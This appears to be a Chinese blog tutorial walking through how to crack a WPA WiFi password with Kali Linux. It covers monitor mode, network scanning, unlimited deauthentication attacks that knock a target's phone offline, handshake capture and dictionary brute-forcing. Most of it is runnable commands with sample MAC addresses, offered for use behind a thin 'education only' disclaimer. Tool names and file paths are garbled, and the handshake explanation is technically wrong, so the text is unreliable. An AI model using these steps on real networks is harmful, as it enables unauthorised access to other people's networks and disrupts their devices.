虚拟机打开终端，用->可移动设备的设置

1、打开终端，使用-ng命令查看

如果出现无法访问...没有这样的文件或目录

解决办法：先在主机上按win+r键，然后输入.msc

进入

找到USB并双击

1.将启动类型更改为自动... 2.启动服务状态... 3.确定

2、打开虚拟机的设置，改成下图2一样（如果是灰色的无法更改，需要关闭kail系统再更改）

将USB无线网卡插入电脑（注：网卡芯片为3070或8187L，购买时请注意）

点击虚拟机->可移动设备->选择带有WLAN的设备->连接

3. 执行命令查看网卡信息。 如果有wlan0则表示连接成功。

4、命令-ng start wlan0开启网卡监控模式

5、输入命令查看网卡信息。 如果网卡名称加上mon则表示成功。

6.命令-ng开始扫描WiFi，按ctrl+c结束任务

BSSID是wifi的MAC地址，PWR是信号强度，值越小信号越强； #DATA是数据量，数字越大，使用的人就越多，CH是信道频率（），ESSID是wifi的名称，中文可能有乱码

7、然后输入-ng --bssid BSSID -c 通道频率-w 抓包存储路径为：-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/无线上网

数据包已经被捕获

如果抓不到数据，则新建一个终端：输入 -ng -0 0 -c 连接WiFi的手机mac地址 -a bssid 网卡名（一般）

例如：-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74

（0 WiFi设备无次数限制，-0 8表示8次攻击。攻击原理是：先让设备离线，设备会再次自动连接。这个自动连接过程会进行三次握手，并发送一个TCP数据包（其中包含加密的数据），我们冒充WiFi热点来窃取该数据包，窃取后我们可以使用字典穷举法来暴力破解加密的WiFi密码。

数据包中的密码经过hash加密，hash加密只能转发）

当出现WPA时，说明抓包成功。

按 Ctrl+c 停止两个终端，否则网络将保持断开状态。

cd 打开抓包目录，ls 列出来，就可以看到我们抓到的数据包了。

8、解压kali自带的字典文件路径：/usr/share//.txt.gz，如：gzip -d/usr/share//.txt.gz 9、输入 -ng -w 字典路径握手包路径，返回车后开始爆破，如：-ng -w /usr/share//.txt /home/wifi-0.1.cap

耐心等待密码被破解...

特别说明：暴力破解并不简单。 它需要足够强大的词典和时间。 您可以通过词典生成工具生成自己的词典。 字典越强大，就越容易破解。 。 哈哈，这也是需要一点运气的！

免责声明：我分享本教程是希望大家通过本教程了解信息安全，提高警惕！ 本教程仅供教学用途，不得用于其他违法用途。 本人不承担任何责任，敬请谅解！